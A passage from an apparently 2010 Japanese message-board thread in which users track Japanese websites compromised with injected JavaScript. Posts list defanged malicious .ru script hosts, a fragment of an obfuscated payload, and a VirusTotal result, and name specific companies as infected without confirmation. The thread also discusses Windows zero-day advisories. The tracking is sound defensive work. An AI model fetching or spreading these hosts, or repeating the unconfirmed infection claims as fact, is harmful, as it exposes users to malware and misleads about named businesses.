2010/07/10(土) 18:33:08ヘルプの脆弱性のやつはウィンドウズアップデートではなくて、
MSの用意したHPから適用をして、対応するんだっけ?
0956名無しさん@そうだ選挙に行こう
2010/07/10(土) 18:49:03今月パッチ配布予定。
0957名無しさん@そうだ選挙に行こう
2010/07/10(土) 18:58:43Microsoft は今回、最近見つかった2つのゼロデイ脆弱性のための
修正パッチをリリースしようとしている。
Googleのエンジニアが先週公開した
ゼロデイ脆弱性の1つは、『Microsoft Windows Help and Support Center』の
機能の欠陥
対応なしは
1.今週初めに匿名のハッカーグループが公表したもう1つのゼロデイ脆弱性に今回対応しない予定
2.
6日にユーザーおよびシステム管理者に対して警告を行なった
開発者向けの重要なクラスライブラリ『Microsoft Foundation Class』(MFC) に存在する
セキュリティホールについても今回対応しない予定
なお、Microsoftはこの日をもって、Windows 2000とWindows XP SP2(32bitのみ)のサポートを打ち切る。
以後、たとえ深刻な問題が見つかったとしても、解決のための更新プログラムは提供しない。
0958名無しさん@そうだ選挙に行こう
2010/07/10(土) 23:39:55アラビア文字っぽい
0960コテハン ◆8080adndqg
2010/07/11(日) 11:08:49www●prjapan●com/ ←どうやったらこうなる?
0961名無しさん@そうだ選挙に行こう
2010/07/11(日) 11:25:21動的なページにはよくあること。
www●prjapan●com/xmlrpc.php
なんてのまでやられてる。
0962夷塚 ◆y0JEaK6O/gDf
2010/07/11(日) 19:35:34gopakgyo●playmateswcc●com:8080/CAD●js
→gopakgyo●playmateswcc●com:8080/index●php_Gk…
→<div name="Ndo251m5n" id="Ndo251m5n">103R100R38R38…
http://www.virustotal.com/analisis/2c338972f6a08ae0b9945b1a00e76025101208c8912be63cc79742294684666a-1278839935
Result: 1/41 (2.44%) … Troj/ObfJS-X
怖くてこれ以上先に行けなかったけど、例の脆弱性狙いかな
Avira、Avast、Kasperskyに検体提出
0963夷塚 ◆y0JEaK6O/gDf
2010/07/12(月) 15:39:49prjapan●com :スクリプト消去/告知なし
www●lalacha●com/product/productList●asp?kindid=4 :found「.ru/js.js」
www●infinitypm●jp/shale52●html :生存/跳び先変更/デジロぇ…
0964名無しさん@お腹いっぱい。
2010/07/12(月) 16:59:00www●keiunkaku●com
ドットコム:8080恐ろしいです><;
0965名無しさん@お腹いっぱい。
2010/07/13(火) 05:40:04このweb改変しているウイルスとは全然違うものでしょうか?
0966名無しさん@お腹いっぱい。
2010/07/13(火) 05:42:570967名無しさん@お腹いっぱい。
2010/07/13(火) 05:46:190968名無しさん@お腹いっぱい。
2010/07/13(火) 05:51:270969夷塚 ◆y0JEaK6O/gDf
2010/07/13(火) 20:43:32www●lalacha●com :再改竄を確認/頑張りすぎorz
> 検出数 URL
> 612 peer●webserviceaan●ru/js●js
> 177 www●lalacha●com/01_js/function●js
> 158 go●postfolkovs●ru/js●js
> 123 sslput●postfolkovs●ru/js●js
> 93 vba●postfolkovs●ru/js●js
> 90 frame●webservicesttt●ru/js●js
> 64 base●webserviceftp●ru/js●js
> 55 ole●webservicesbba●ru/js●js
> 54 confirm●postfolkovs●ru/js●js
> 54 ntio●webservicelupa●ru/js●js
> 27 www●ads-t●ru/ads●js
0970名無しさん@お腹いっぱい。
2010/07/15(木) 05:22:160971名無しさん@お腹いっぱい。
2010/07/15(木) 05:23:56大学のサイトなんて他のサイトと比べてアクセスされる回数は多いんだから
0972名無しさん@お腹いっぱい。
2010/07/15(木) 05:26:530973名無しさん@お腹いっぱい。
2010/07/15(木) 13:45:250974名無しさん@お腹いっぱい。
2010/07/15(木) 21:33:400975名無しさん@お腹いっぱい。
2010/07/16(金) 13:28:390976名無しさん@お腹いっぱい。
2010/07/18(日) 12:57:21新しいコンテンツがあったので登録しようとしたら、
別のページへ飛ぶんだけど、その時に火狐のCookieの許可画面で〜.jp:8080て表示が出たが、
これは怪しいサイト?
aguseで元リンクからとか探ったけど、反応は出なかった
0977名無しさん@お腹いっぱい。
2010/07/18(日) 13:12:45ここは鑑定スレじゃないので、その辺を
自分で判断できないなら他行ってくれ。
0978名無しさん@お腹いっぱい。
2010/07/18(日) 13:27:44URL貼れよ
0979名無しさん@お腹いっぱい。
2010/07/18(日) 14:56:38の「今すぐはじめる」をクリックした次の同意ページで、
同意を選ぶと出るクッキー可否が8080表示ですが・・・
同意ページはどのゲームでも8080クッキーが出ます
0980名無しさん@お腹いっぱい。
2010/07/18(日) 17:06:180981名無しさん@お腹いっぱい。
2010/07/18(日) 23:26:36あれば問題なしと思われる
0982名無しさん@お腹いっぱい。
2010/07/19(月) 18:53:420983名無しさん@お腹いっぱい。
2010/07/20(火) 09:39:22www●hoshino-jimusho●co●jp
minimini-east●jp
ミニミニで部屋借りるのやめとこ…
0984名無しさん@お腹いっぱい。
2010/07/20(火) 16:49:34saitama●rl-toyota●co●jp
www●career-engine●jp
www●kaitori-bancho●com
トヨタレンタリース埼玉www
0985オルティスジャパン
2010/07/20(火) 18:58:05暇なので電凸
>minimini-east●jp
別の方より連絡済
調査会社に依頼した結果感染の事実なしの連絡ありだそうです
私から説明して置きました
>www●hoshino-jimusho●co●jp
他の方から感染の話しがないので
私を警察に訴えるとの事
上等ですw
警視庁ハイテク課、赤坂署の確認した所、連絡が有った事実は確認されず
警視庁ハイテク課から>www●hoshino-jimusho●co●jpに連絡して貰う様約束
魚拓
http://megalodon.jp/2010-0720-1730-26/www.hoshino-jimusho.co.jp/
aguse
http://www.aguse.jp/?m=w&url=http%3A%2F%2Fwww.hoshino-jimusho.co.jp%2F&x=13&y=13
0986名無しさん@お腹いっぱい。
2010/07/20(火) 19:15:150987名無しさん@お腹いっぱい。
2010/07/20(火) 19:39:34マニュアルでもあるのか
0988名無しさん@お腹いっぱい。
2010/07/20(火) 19:50:40> 私を警察に訴えるとの事
( ゚д゚)ポカーン ( ゚д゚)ポカーン ( ゚д゚)ポカーン ( ゚д゚)ポカーン
0989名無しさん@お腹いっぱい。
2010/07/20(火) 20:19:59直したのか、勘違いしたのか…
0990名無しさん@お腹いっぱい。
2010/07/20(火) 23:24:39支援
reginaにもメルポ。
0991名無しさん@お腹いっぱい。
2010/07/21(水) 01:02:24【ゼロデイ攻撃】Windowsの脆弱性狙うトロイの木馬〜MSがアドバイザリ公開
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2296
マイクロソフト セキュリティ アドバイザリ (2286198)
Windows シェルの脆弱性により、リモートでコードが実行される
ttp://www.microsoft.com/japan/technet/security/advisory/2286198.mspx
WebClient無効は必須やね。
0992名無しさん@お腹いっぱい。
2010/07/21(水) 01:03:130993名無しさん@お腹いっぱい。
2010/07/21(水) 07:53:51WebDAV(WebClient)無効はあくまでWebDAV使った攻撃を潰せるだけで、
ネットワークドライブとかUSBメモリとかには無力です。
他の既知の脆弱性を組み合わせてexeとセットで
ローカルに落とし込むドロッパもありえます。
必須なのはWebDAVよりもlnkアイコンを潰すことです。
regeditでめんどいしデスクトップがダサくなるけど。
0994名無しさん@お腹いっぱい。
2010/07/21(水) 10:45:16書き込みされた時点ではaguseで出たから
こっそり修正→感染の事実無し
という流れだろうなぁ…
0995名無しさん@お腹いっぱい。
2010/07/21(水) 11:47:570996名無しさん@お腹いっぱい。
2010/07/21(水) 12:10:350997名無しさん@お腹いっぱい。
2010/07/21(水) 12:37:520998名無しさん@お腹いっぱい。
2010/07/21(水) 13:27:53www●kakiyasuhonten●co●jp
0999名無しさん@お腹いっぱい。
2010/07/21(水) 13:52:18www●kidsdrink●jp
1000名無しさん@お腹いっぱい。
2010/07/21(水) 14:10:0610011001
Over 1000Threadもう書けないので、新しいスレッドを立ててくださいです。。。
レス数が1000を超えています。これ以上書き込みはできません。